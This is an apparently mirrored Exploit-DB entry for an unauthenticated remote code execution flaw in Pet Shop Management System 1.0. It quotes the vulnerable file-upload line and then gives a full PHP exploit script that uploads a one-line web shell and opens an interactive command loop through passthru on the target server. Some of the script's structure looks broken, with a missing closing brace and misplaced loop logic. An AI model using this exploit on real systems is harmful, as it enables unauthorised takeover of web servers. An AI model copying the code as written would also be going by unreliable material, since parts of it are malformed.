Pet Shop Management System 1.0 – Remote Code Execution (RCE) (Unauthenticated) - 体验盒子

作者： Mr.Gedik

日期： 2021-09-29

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/50353/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

# Date: 28.09.2021

# Author: Mr.Gedik

# Vendor Homepage: https://www.sourcecodester.com

# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html

# Version: 1.0

# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB

Vulnerable code controllers/add_petmanagement.php

Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],

$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .

addslashes($_FILES["images"]["name"]));

Exploit

#############

<?php

/*

@author:mrgedik

*/

function anim($msg, $time)

{

$msg = str_split($msg);

foreach ($msg as $ms) {

echo $ms;

usleep($time);

}

anim("____ ______ _ _

|\/| / ____|| (_) |

| \/ |_ __| |_______| |_| | __

| |\/| | '__| | |_ |/ _ \/ _` | | |/ /

| || | |_ | |__| |__/ (_| | | <

|_||_|_(_) \_____|\___|\__,_|_|_|\_\

", 900);

echo PHP_EOL;

while(1)

{

echo anim("Target (http://example.com/path/): ", 800);

$target = trim(fgets(STDIN));

echo PHP_EOL;

if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {

echo "Not a valid URL".PHP_EOL;

}else {

break;

}

@unlink("exp.php");

$fw = fopen("exp.php","a+");

fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');

fclose($fw);

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");

$fields = [

'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')

];

curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);

$response = curl_exec($ch);

@unlink("exp.php");

if(strstr($response,"success"))

{

while(1)

{

echo anim("root@pwn: ", 800);

$command = trim(fgets(STDIN));

if($command == trim("exit"))

{

exit;

}

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

echo curl_exec($ch);

curl_close ($ch);

}

}else

{

echo anim("Fail", 800);

}

?>